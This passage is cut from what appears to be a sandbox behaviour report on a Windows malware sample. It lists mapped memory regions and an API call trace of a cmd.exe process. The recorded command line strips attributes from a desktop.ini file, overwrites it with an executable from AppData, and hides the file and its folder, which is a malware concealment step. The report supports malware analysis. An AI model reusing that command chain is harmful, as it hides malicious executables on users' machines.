= 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16794 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16795 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16796 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16797 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16798 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16799 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16800 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16801 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 16802 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16803 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16804 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16805 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16806 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16807 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16808 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16809 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16810 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 16872 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 247 os_tid = 0x85c [0143.736] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efbc4 | out: lpSystemTimeAsFileTime=0x2efbc4*(dwLowDateTime=0x8f9bf380, dwHighDateTime=0x1d440a9)) [0143.736] GetCurrentProcessId () returned 0xfdc [0143.736] GetCurrentThreadId () returned 0x85c [0143.736] GetTickCount () returned 0x2ce65 [0143.736] QueryPerformanceCounter (in: lpPerformanceCount=0x2efbbc | out: lpPerformanceCount=0x2efbbc*=20052563583) returned 1 [0143.737] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.737] __set_app_type (_Type=0x1) [0143.737] __p__fmode () returned 0x76b331f4 [0143.737] __p__commode () returned 0x76b331fc [0143.737] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.738] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.738] GetCurrentThreadId () returned 0x85c [0143.738] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x85c) returned 0x38 [0143.738] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.738] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.738] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.738] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efb54 | out: phkResult=0x2efb54*=0x0) returned 0x2 [0143.738] VirtualQuery (in: lpAddress=0x2efb8b, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.738] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.738] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.738] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.738] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.738] GetConsoleOutputCP () returned 0x1b5 [0143.739] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.739] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.739] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.739] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.739] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.739] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.739] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.740] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.740] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.740] GetEnvironmentStringsW () returned 0x440520* [0143.740] FreeEnvironmentStringsW (penv=0x440520) returned 1 [0143.740] GetEnvironmentStringsW () returned 0x440520* [0143.740] FreeEnvironmentStringsW (penv=0x440520) returned 1 [0143.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeac4 | out: phkResult=0x2eeac4*=0x40) returned 0x0 [0143.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0xd0, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.740] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x1, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x1, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x0, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x40, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x40, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x40, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegCloseKey (hKey=0x40) returned 0x0 [0143.741] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeac4 | out: phkResult=0x2eeac4*=0x40) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x40, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x1, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x1, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x0, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x9, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x9, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x9, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegCloseKey (hKey=0x40) returned 0x0 [0143.741] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.741] srand (_Seed=0x5b886372) [0143.741] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"" [0143.741] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"" [0143.741] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.742] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441c80, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.742] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.742] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.742] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.742] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.742] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.742] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.742] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.742] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.742] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.742] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.742] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.742] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.742] GetEnvironmentStringsW () returned 0x442670* [0143.743] FreeEnvironmentStringsW (penv=0x442670) returned 1 [0143.743] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.743] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.743] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.743] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.743] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.743] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.743] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.743] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.743] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.743] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.743] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef890 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.743] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef890, lpFilePart=0x2ef88c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef88c*="Desktop") returned 0x18 [0143.743] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.743] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef60c | out: lpFindFileData=0x2ef60c) returned 0x440d00 [0143.743] FindClose (in: hFindFile=0x440d00 | out: hFindFile=0x440d00) returned 1 [0143.743] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef60c | out: lpFindFileData=0x2ef60c) returned 0x440d00 [0143.743] FindClose (in: hFindFile=0x440d00 | out: hFindFile=0x440d00) returned 1 [0143.744] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef60c | out: lpFindFileData=0x2ef60c) returned 0x440d00 [0143.744] FindClose (in: hFindFile=0x440d00 | out: hFindFile=0x440d00) returned 1 [0143.744] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.744] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.744] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.744] GetEnvironmentStringsW () returned 0x440520* [0143.744] FreeEnvironmentStringsW (penv=0x440520) returned 1 [0143.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.745] GetConsoleOutputCP () returned 0x1b5 [0143.745] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.745] GetUserDefaultLCID () returned 0x409 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef9d0, cchData=128 | out: lpLCData="0") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef9d0, cchData=128 | out: lpLCData="0") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef9d0, cchData=128 | out: lpLCData="1") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.746] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.747] GetConsoleTitleW (in: lpConsoleTitle=0x430b20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.747] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.747] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.747] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.747] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.748] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0143.748] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0143.748] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0143.748] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0143.748] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0143.748] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0143.748] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0143.751] _wcsicmp (_String1="del", _String2=")") returned 59 [0143.751] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0143.751] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0143.751] _wcsicmp (_String1="IF", _String2="del") returned 5 [0143.751] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0143.751] _wcsicmp (_String1="REM", _String2="del") returned 14 [0143.751] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0143.754] _wcsicmp (_String1="type", _String2=")") returned 75 [0143.754] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0143.754] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0143.754] _wcsicmp (_String1="IF", _String2="type") returned -11 [0143.754] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0143.754] _wcsicmp (_String1="REM", _String2="type") returned -2 [0143.754] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0143.922] SetErrorMode (uMode=0x0) returned 0x0 [0143.922] SetErrorMode (uMode=0x1) returned 0x0 [0143.922] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x440528, lpFilePart=0x2ef184 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef184*="Desktop") returned 0x18 [0143.922] SetErrorMode (uMode=0x0) returned 0x1 [0143.922] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.922] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.927] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.927] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0xffffffff [0143.929] GetLastError () returned 0x2 [0143.929] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0xffffffff [0143.929] GetLastError () returned 0x2 [0143.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0x440810 [0143.929] FindClose (in: hFindFile=0x440810 | out: hFindFile=0x440810) returned 1 [0143.930] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0xffffffff [0143.930] GetLastError () returned 0x2 [0143.930] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0x440810 [0143.930] FindClose (in: hFindFile=0x440810 | out: hFindFile=0x440810) returned 1 [0143.930] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.930] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.930] GetConsoleTitleW (in: lpConsoleTitle=0x2ef3f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.930] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef280, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef348 | out: lpAttributeList=0x2ef280, lpSize=0x2ef348) returned 1 [0143.930] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef280, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef340, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef280, lpPreviousValue=0x0) returned 1 [0143.930] GetStartupInfoW (in: lpStartupInfo=0x2ef23c | out: lpStartupInfo=0x2ef23c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0143.930] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0143.931] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef328 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", lpProcessInformation=0x2ef328*(hProcess=0x50, hThread=0x4c, dwProcessId=0x53c, dwThreadId=0x9c4)) returned 1 [0144.019] CloseHandle (hObject=0x4c) returned 1 [0144.019] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0144.019] GetEnvironmentStringsW () returned 0x440aa0* [0144.019] FreeEnvironmentStringsW (penv=0x440aa0) returned 1 